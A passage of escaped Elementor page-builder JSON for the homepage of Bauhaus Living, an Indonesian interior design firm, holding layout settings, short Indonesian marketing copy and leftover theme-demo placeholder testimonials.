0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 